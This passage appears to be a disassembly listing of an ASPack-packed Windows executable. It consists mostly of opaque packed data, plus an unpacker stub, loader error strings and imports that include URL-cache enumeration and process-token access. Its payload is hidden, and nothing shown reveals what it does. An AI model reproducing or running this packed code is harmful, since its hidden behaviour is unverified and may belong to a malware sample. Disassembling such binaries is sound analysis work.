dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75063E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_44A4DB: ; CODE XREF: start+6E�j
mov eax, ss:dword_443A76[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov ss:dword_443EA1[ebp], eax
popa
jnz short loc_44A4FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_44A4FC: ; CODE XREF: start+4F1�j
push offset sub_401219
retn
start endp
; ---------------------------------------------------------------------------
aLeHd db '',8,'HD',0
aNnahd db 'AHD',0
dw 5051h
dd 491495FFh, 85890044h, 4439EDh, 4851858Dh, 0FF500044h
dd 44491C95h, 4D858900h, 8D004448h, 44485C8Dh, 0FF505100h
dd 44491495h, 0F1858900h, 8B004439h, 44484D85h, 688D8D00h
dd 51004448h, 1495FF50h, 0FF004449h, 10C483D0h, 8D306A5Fh
dd 4448729Dh, 6A575300h, 0F195FF00h, 6A004439h, 0ED95FFFFh
db 39h, 44h, 0
; =============== S U B R O U T I N E =======================================
sub_44A577 proc near ; CODE XREF: start+1�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_44A577 endp
; ---------------------------------------------------------------------------
db 8Bh, 44h, 24h
dd 54EC8110h, 8D000003h, 5004244Ch, 3A8E8h, 248C8B00h
dd 35Ch, 5824948Bh, 51000003h, 244C8D52h, 40DE80Ch, 0C0840000h
dd 0C8830A75h, 54C481FFh, 0C3000003h, 60248C8Bh, 8D000003h
dd 51502404h, 0C244C8Dh, 5EFE8h, 75C08400h, 0FFC8830Ah
dd 354C481h, 8BC30000h, 0C4812404h, 354h, 10C2h, 4030201h
dd 8070605h, 100E0C0Ah, 201C1814h, 40383028h, 80706050h
dd 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h, 0D18B5112h, 8B956h, 39570000h, 3572044Ah
dd 0FFF8BE53h, 28BFFFFh, 8840188Ah, 890C245Ch, 8428B02h
dd 0C247C8Bh, 8108E0C1h, 0FFE7h, 8BC70B00h, 0FE03047Ah
dd 8B084289h, 47A89C7h, 0D273C13Bh, 4728B5Bh, 8B08428Bh
dd 2B10247Ch, 0B9E8D3CEh, 18h, 0FF25CF2Bh, 0D300FFFFh
dd 5FF703E8h, 5E047289h, 4C259h, 424448Bh, 824548Bh, 848189h
dd 91890000h, 88h, 8982048Dh, 8C81h, 1000500h, 8C20000h
dd 98EC8100h, 53000000h, 0D18B5655h, 0FB957h, 0AA8B0000h
dd 84h, 7C8DC033h, 0F6332C24h, 0BC8BABF3h, 0AC24h, 89EE3B00h
dd 76202454h, 8AC93315h, 5C8B380Ch, 4C8D288Ch, 4043288Ch
dd 1989C53Bh, 17B9EB72h, 89000000h, 89282474h, 72890472h
dd 24748944h, 89FF3368h, 0C71C2474h, 1102444h, 89000000h
dd 8D18244Ch, 7489086Ah, 448B1424h, 0E0D32C34h, 0FF81F803h
dd 1000000h, 24247C89h, 8E870Fh, 448B0000h, 7D892834h
dd 3C5D8B00h, 0F983C303h, 40458910h, 6C344489h, 758B4D7Ch
dd 24448B00h, 245C8B10h, 8CBA8B1Ch, 0C1000000h, 0CE8B10EEh
dd 0FF25h, 3CB2B00h, 8BD88AFBh, 89FB8AD1h, 8B1C2474h, 24748BC3h
dd 10E0C114h, 0C1C38B66h, 0ABF302E9h, 548BCA8Bh, 0E1832024h
dd 8BAAF303h, 8B24247Ch, 8B18244Ch, 83102444h, 494004C6h
dd 8304C583h, 448909F9h, 4C891024h, 74891824h, 8D0F1424h
dd 0FFFFFF62h, 0FF81h, 0F740100h, 325D5E5Fh, 0C4815BC0h
dd 98h, 8B0004C2h, 8482h, 85C93300h, 8B3B76C0h, 0AC24B4h
dd 48A0000h, 74C08431h, 88BA8B22h, 25000000h, 0FFh, 6884448Bh
dd 33870C89h, 31048AC0h, 68847C8Bh, 6884448Dh, 8B388947h
dd 8482h, 0C83B4100h, 5E5FCC72h, 5B01B05Dh, 98C481h, 4C20000h
dd 56535100h, 8B57F18Bh, 4788306h, 8B307208h, 41118A08h
dd 0C245488h, 488B0889h, 24548B08h, 8E1C10Ch, 0FFE281h
dd 0CA0B0000h, 8304508Bh, 4889F8C2h, 89CA8B08h, 0F9830450h
dd 8BD07308h, 408B0450h, 8B908h, 0CA2B0000h, 4E8BE8D3h
dd 0FE002524h, 0C13B00FFh, 968B1473h, 8Ch, 0E9C1C88Bh
dd 8ADB3310h, 0D38B111Ch, 463B3BEBh, 3B0A732Ch, 0D21B2846h
dd 0EB0AC283h, 30463B2Ch, 0BBA0773h, 0EB000000h, 34463B20h
dd 0CBA0773h, 0EB000000h, 38463B14h, 0DBA0773h, 0EB000000h
dd 3C463B08h, 0C283D21Bh, 8B0E8B0Fh, 0FA030479h, 8B047989h
dd 18B9961Ch, 2B000000h, 5FCA2BC3h, 4C8BE8D3h, 0C1034496h
dd 888E8Bh, 5B5E0000h, 5981048Bh, 575653C3h, 0D233F98Bh
dd 0B78DC033h, 268h, 0E8561689h, 25Eh, 0C7308C8Ah, 5E00443Fh
dd 1BBh, 4C68300h, 0D303E3D3h, 3AF88340h, 448BDE72h, 4F8D1024h
dd 0D1685010h, 0E8000002h, 0FFFFFD48h, 8D1C6A50h, 0A08Fh
dd 0FD3AE800h, 6A50FFFFh, 308F8D08h, 0E8000001h, 0FFFFFD2Ch
dd 8D136A50h, 1C08Fh, 0FD1EE800h, 8789FFFFh, 260h, 0F5055E5Fh
dd 5B000002h, 8B0004C2h, 8B082444h, 244C8BD1h, 2895704h
dd 8904428Dh, 440C708h, 20h, 89104289h, 0A082h, 30828900h
dd 89000001h, 1C082h, 0B9C03300h, 0BDh, 2508289h, 82890000h
dd 254h, 2588289h, 0BA8B0000h, 260h, 25C8289h, 0ABF30000h
dd 0E8AACA8Bh, 4, 8C25Fh, 30CEC81h, 8B530000h, 8D5655D9h
dd 6A57046Bh, 0E8CD8B01h, 0FFFFFC29h, 0E75C085h, 260BB8Bh
dd 0BDB90000h, 0F3000000h, 0F633AAABh, 0CD8B046Ah, 0FFFC0CE8h
dd 344488FFh, 0FE834610h, 8DED7213h, 1C0BBh, 24448D00h
dd 0CF8B5010h, 0FFFC80E8h, 75C084FFh, 5D5E5F0Bh, 0CC4815Bh
dd 0C3000003h, 0CF8BF633h, 0FFFDE4E8h, 10F883FFh, 8B8B1573h
dd 260h, 231148Ah, 0FE280D0h, 24345488h, 7560EB46h, 8B026A28h
dd 0FBB3E8CDh, 0C083FFFFh, 7EC08503h, 0F5FE814Eh, 7D000002h
dd 344C8A52h, 4C884823h, 85462434h, 0EBEA7FC0h, 11F88336h
dd 36A0E75h, 86E8CD8Bh, 83FFFFFBh, 0CEB03C0h, 0CD8B076Ah
dd 0FFFB78E8h, 0BC083FFh, 137EC085h, 2F5FE81h, 177D0000h
dd 243444C6h, 85484600h, 81ED7FC0h, 2F5FEh, 738C0F00h
dd 8DFFFFFFh, 8D242454h, 0E852104Bh, 0FFFFFBD5h, 0B75C084h
dd 5B5D5E5Fh, 30CC481h, 8DC30000h, 2F52484h, 8B8D0000h
dd 0A0h, 0FBB3E850h, 0C084FFFFh, 5E5F0B75h, 0C4815B5Dh
dd 30Ch, 248C8DC3h, 311h, 308B8D51h, 0E8000001h, 0FFFFFB91h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 0C6C30000h, 26483h
dd 0C0330000h, 1104BC80h, 3000003h, 83400875h, 0F07208F8h
dd 83C607EBh, 264h, 60838B01h, 8D000002h, 0BE24244Ch, 2F5h
dd 1088118Ah, 754E4140h, 5D5E5FF7h, 815B01B0h, 30CC4h
dd 1E8C300h, 90000000h, 5BEE815Eh, 0C3004445h, 8B14EC83h
dd 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC7CE8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC2FE800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 443FABh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 3F8F308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 0C735948Ah
dd 5E00443Fh, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB14E8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF0h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h, 0
dd 8, 400000h, 77E60000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 77E7A5FDh
dd 77E79F93h, 77E805D8h, 0
aKernel32_dll_2 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 10h
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 4AF80h, 4AF70h, 3 dup(0)
dd 4B074h, 4B0C4h, 3 dup(0)
dd 4B081h, 4B0CCh, 3 dup(0)
dd 4B08Dh, 4B0D4h, 3 dup(0)
dd 4B097h, 4B0DCh, 3 dup(0)
dd 4B0A2h, 4B0E4h, 3 dup(0)
dd 4B0ACh, 4B0ECh, 3 dup(0)
dd 4B0B9h, 4B0F4h, 5 dup(0)
aOleaut32_dll db 'oleaut32.dll',0
aWininet_dll_0 db 'wininet.dll',0
aOle32_dll_0 db 'ole32.dll',0
aUser32_dll_1 db 'user32.dll',0
aGdi32_dll_0 db 'gdi32.dll',0
aAdvapi32_dll_1 db 'advapi32.dll',0
aCrtdll_dll_0 db 'crtdll.dll',0
dd 77121680h, 0
dd 7620FB39h, 0
dd 771C1E56h, 0
aW db '&w',0
align 4
aMW db '$w',0
align 4
aW_0 db ' ]w',0
align 4
aIoS db 'os',0
align 4
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 6C6C6143h
dd 646E6957h, 7250776Fh, 41636Fh, 65470000h, 6F745374h
dd 624F6B63h, 7463656Ah, 4F000000h, 506E6570h, 65636F72h
dd 6F547373h, 6E656Bh, 695F0000h, 616F74h, 3A2h dup(0)
_aspack ends
; Section 7. (virtual address 0004D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44D000h
align 2000h
_idata2 ends
end start